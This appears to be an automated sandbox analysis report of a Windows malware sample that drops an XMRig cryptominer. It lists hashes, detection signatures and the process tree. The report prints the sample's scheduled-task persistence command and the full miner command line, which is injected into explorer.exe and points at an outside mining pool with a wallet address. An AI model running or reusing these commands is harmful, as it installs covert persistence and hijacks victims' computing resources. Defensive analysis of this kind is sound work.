Analysis
-
max time kernel
137s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
23-07-2021 19:07
Static task
static1
Behavioral task
behavioral1
Sample
eb9f90fdaf8f78ff76132098d17fd0bd.exe
Resource
win7v20210410
General
-
Target
eb9f90fdaf8f78ff76132098d17fd0bd.exe
-
Size
45KB
-
MD5
eb9f90fdaf8f78ff76132098d17fd0bd
-
SHA1
516bbca9d82ae9e8d35a5120cf16b95d87a8c35a
-
SHA256
479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204
-
SHA512
fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2388-137-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/2388-138-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/2388-140-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
Services.exesihost64.exepid process 2704 Services.exe 8 sihost64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Services.exedescription pid process target process PID 2704 set thread context of 2388 2704 Services.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2600 schtasks.exe 1544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
eb9f90fdaf8f78ff76132098d17fd0bd.exeServices.exepid process 1868 eb9f90fdaf8f78ff76132098d17fd0bd.exe 2704 Services.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
eb9f90fdaf8f78ff76132098d17fd0bd.exeServices.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1868 eb9f90fdaf8f78ff76132098d17fd0bd.exe Token: SeDebugPrivilege 2704 Services.exe Token: SeLockMemoryPrivilege 2388 explorer.exe Token: SeLockMemoryPrivilege 2388 explorer.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
eb9f90fdaf8f78ff76132098d17fd0bd.execmd.exeServices.execmd.exedescription pid process target process PID 1868 wrote to memory of 3860 1868 eb9f90fdaf8f78ff76132098d17fd0bd.exe cmd.exe PID 1868 wrote to memory of 3860 1868 eb9f90fdaf8f78ff76132098d17fd0bd.exe cmd.exe PID 3860 wrote to memory of 2600 3860 cmd.exe schtasks.exe PID 3860 wrote to memory of 2600 3860 cmd.exe schtasks.exe PID 1868 wrote to memory of 2704 1868 eb9f90fdaf8f78ff76132098d17fd0bd.exe Services.exe PID 1868 wrote to memory of 2704 1868 eb9f90fdaf8f78ff76132098d17fd0bd.exe Services.exe PID 2704 wrote to memory of 2096 2704 Services.exe cmd.exe PID 2704 wrote to memory of 2096 2704 Services.exe cmd.exe PID 2704 wrote to memory of 8 2704 Services.exe sihost64.exe PID 2704 wrote to memory of 8 2704 Services.exe sihost64.exe PID 2096 wrote to memory of 1544 2096 cmd.exe schtasks.exe PID 2096 wrote to memory of 1544 2096 cmd.exe schtasks.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe PID 2704 wrote to memory of 2388 2704 Services.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe"C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos --pass= --cpu-max-threads-hint=50 --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Services.exeMD5
eb9f90fdaf8f78ff76132098d17fd0bd
SHA1516bbca9d82ae9e8d35a5120cf16b95d87a8c35a
SHA256479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204
SHA512fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d
-
C:\Users\Admin\AppData\Local\Temp\Services.exeMD5
eb9f90fdaf8f78ff76132098d17fd0bd
SHA1516bbca9d82ae9e8d35a5120cf16b95d87a8c35a
SHA256479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204
SHA512fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
8a967775b61469d620643ac7b8623551
SHA107cce4043304be719aab5aafe75e7e966276cf1c
SHA256212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e
SHA51210c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
8a967775b61469d620643ac7b8623551
SHA107cce4043304be719aab5aafe75e7e966276cf1c
SHA256212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e
SHA51210c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1
-
memory/8-132-0x0000000000370000-0x0000000000371000-memory.dmpFilesize
4KB
-
memory/8-136-0x0000000002A20000-0x0000000002A22000-memory.dmpFilesize
8KB
-
memory/8-129-0x0000000000000000-mapping.dmp
-
memory/1544-134-0x0000000000000000-mapping.dmp
-
memory/1868-114-0x0000000000C70000-0x0000000000C71000-memory.dmpFilesize
4KB
-
memory/1868-120-0x0000000003740000-0x0000000003742000-memory.dmpFilesize
8KB
-
memory/1868-117-0x00000000036F0000-0x00000000036F1000-memory.dmpFilesize
4KB
-
memory/1868-116-0x0000000001590000-0x0000000001599000-memory.dmpFilesize
36KB
-
memory/2096-128-0x0000000000000000-mapping.dmp
-
memory/2388-138-0x00000001402EB66C-mapping.dmp
-
memory/2388-137-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2388-139-0x0000000000C00000-0x0000000000C20000-memory.dmpFilesize
128KB
-
memory/2388-140-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2388-143-0x0000000014150000-0x0000000014170000-memory.dmpFilesize
128KB
-
memory/2388-144-0x0000000014600000-0x0000000014620000-memory.dmpFilesize
128KB
-
memory/2388-146-0x0000000014370000-0x0000000014390000-memory.dmpFilesize
128KB
-
memory/2388-145-0x0000000014390000-0x00000000143B0000-memory.dmpFilesize
128KB
-
memory/2600-119-0x0000000000000000-mapping.dmp
-
memory/2704-121-0x0000000000000000-mapping.dmp
-
memory/2704-135-0x000000001CB02000-0x000000001CB03000-memory.dmpFilesize
4KB
-
memory/3860-118-0x0000000000000000-mapping.dmp